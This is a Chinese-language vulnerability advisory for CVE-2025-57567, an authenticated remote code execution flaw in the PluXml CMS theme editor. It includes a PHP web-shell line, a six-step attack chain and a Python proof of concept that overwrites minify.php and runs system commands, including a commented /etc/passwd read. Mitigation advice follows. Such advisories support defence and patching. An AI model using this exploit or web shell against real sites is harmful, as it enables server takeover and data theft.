CVE-2025-57567：PluXml CMS主题编辑器远程代码执行漏洞

漏洞信息

漏洞编号

CVE-2025-57567

漏洞类型

远程代码执行（RCE）

CVSS评分

9.1 严重

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

PluXml CMS

漏洞概述

CVE-2025-57567是PluXml CMS主题编辑器中存在的一个严重远程代码执行（RCE）漏洞，CVSS评分为9.1，属于严重级别。该漏洞位于PluXml CMS默认主题目录下的minify.php文件（路径为/themes/defaut/css/minify.php）。PluXml是一款轻量级的开源内容管理系统（CMS），以其简洁性和易用性而受到中小型网站管理员的青睐。

该漏洞的根本原因在于主题编辑器对管理员用户权限的校验不足，允许已认证的管理员用户通过管理面板直接覆盖minify.php文件的内容。攻击者可以将任意PHP代码写入该文件，由于该文件位于Web可访问目录下，PHP代码将随后续请求被Web服务器解析执行，从而实现远程代码执行。攻击者一旦成功利用该漏洞，即可在服务器上执行任意系统命令，包括但不限于读取敏感文件、植入WebShell、横向移动、数据窃取以及完全控制服务器等恶意行为。

由于该漏洞需要管理员权限（PR:H）才能利用，因此攻击者需要首先获取合法的管理员凭据，或者通过其他途径（如社会工程、凭据泄露等）获得管理员访问权限。尽管如此，一旦获得管理员权限，利用该漏洞的攻击过程非常简单且无需用户交互（UI:N），对系统的机密性、完整性和可用性均产生高影响（C:H/I:H/A:H），同时影响范围会发生改变（S:C），可能波及其他安全域。

技术细节

PluXml CMS主题编辑器功能允许管理员通过Web管理面板编辑主题相关的文件，包括CSS、JavaScript以及PHP文件。然而，该编辑器在实现上存在严重的安全缺陷，未对可编辑文件类型进行充分的限制或过滤。

具体而言，漏洞存在于/themes/defaut/css/minify.php文件中。该文件原本是一个用于压缩CSS资源的辅助脚本，位于Web可访问目录中。当管理员通过主题编辑器修改该文件内容时，系统未对写入内容进行安全检查，允许注入任意PHP代码。

利用方式如下：
1. 攻击者首先需要获取PluXml CMS的管理员凭据（用户名和密码），可以通过暴力破解、社会工程或凭据泄露等方式获得。
2. 登录管理面板后，导航至主题编辑器功能。
3. 定位到/themes/defaut/css/minify.php文件，使用编辑器将其内容替换为恶意的PHP代码，例如：<?php system($_GET['cmd']); ?>。
4. 保存修改后，通过Web浏览器直接访问该文件，并附加命令参数，如/themes/defaut/css/minify.php?cmd=id，即可执行系统命令。
5. 攻击者可以进一步上传完整的WebShell，获取对服务器的持久化控制权限。

该漏洞的CVSS向量为CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H，表明攻击通过网络发起、攻击复杂度低、需要高权限（管理员）、无需用户交互、影响范围会改变、对机密性、完整性和可用性均产生高影响。

攻击链分析

STEP 1

步骤1：获取管理员凭据

攻击者通过暴力破解、社会工程、凭据泄露或其他方式获取PluXml CMS管理员账户的用户名和密码。

STEP 2

步骤2：登录管理面板

使用获取的管理员凭据登录PluXml CMS的后台管理面板（通常位于/core/admin/路径下）。

STEP 3

步骤3：定位主题编辑器

在管理面板中导航至主题编辑器功能，找到/themes/defaut/css/minify.php文件。

STEP 4

步骤4：注入恶意PHP代码

通过主题编辑器将minify.php的内容替换为恶意的PHP代码（如WebShell或命令执行代码），并保存修改。

STEP 5

步骤5：执行远程命令

通过Web浏览器直接访问被修改的minify.php文件，利用注入的PHP代码执行任意系统命令，获取服务器控制权限。

STEP 6

步骤6：持久化与横向移动

植入持久化后门，窃取敏感数据，进行内网横向移动，进一步扩大攻击影响范围。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-57567 PluXml CMS Theme Editor RCE PoC
# Description: Exploits arbitrary PHP code injection via theme editor in minify.php

import requests
from bs4 import BeautifulSoup
import sys

TARGET_URL = "http://target-pluxml-site.com"
ADMIN_USER = "admin"
ADMIN_PASS = "password"

# Step 1: Login to admin panel
session = requests.Session()
login_url = f"{TARGET_URL}/core/admin/auth.php"
login_data = {
    "login": ADMIN_USER,
    "password": ADMIN_PASS,
    "submit": ""
}
response = session.post(login_url, data=login_data)

# Step 2: Inject malicious PHP code into minify.php via theme editor
malicious_code = '<?php if(isset($_GET["cmd"])){system($_GET["cmd"]);} ?>'
theme_editor_url = f"{TARGET_URL}/core/admin/theme.php"
edit_data = {
    "action": "edit",
    "file": "../themes/defaut/css/minify.php",
    "content": malicious_code
}
response = session.post(theme_editor_url, data=edit_data)

# Step 3: Execute system command via injected webshell
shell_url = f"{TARGET_URL}/themes/defaut/css/minify.php?cmd=id"
response = requests.get(shell_url)
print(f"Command output: {response.text}")

# Step 4: Get reverse shell or full server access
# response = requests.get(f"{shell_url}&cmd=cat+/etc/passwd")
# print(response.text)

影响范围

PluXml CMS 所有未修复版本（具体版本范围待官方确认）

防御指南

临时缓解措施

在官方发布修复补丁之前，建议采取以下临时缓解措施：1）限制主题编辑器的功能，仅允许编辑CSS和JS等静态文件，禁止编辑任何.php文件；2）通过文件系统权限设置，将themes/defaut/css/minify.php设为只读，防止被覆盖修改；3）加强管理员账户安全，启用强密码策略和双因素认证，限制管理面板的访问IP范围；4）部署WAF规则，监控对minify.php等敏感文件的访问和修改请求；5）定期检查Web目录下的PHP文件，及时发现异常的WebShell文件。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-57567
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-57567
3 Details https://www.cvedetails.com/cve/CVE-2025-57567/
4 VulDB https://vuldb.com/cve/CVE-2025-57567
5 Link http://pluxml.com
6 Link https://github.com/lukehebe/Vulnerability-Disclosures/blob/main/CVE-2025-57567.pdf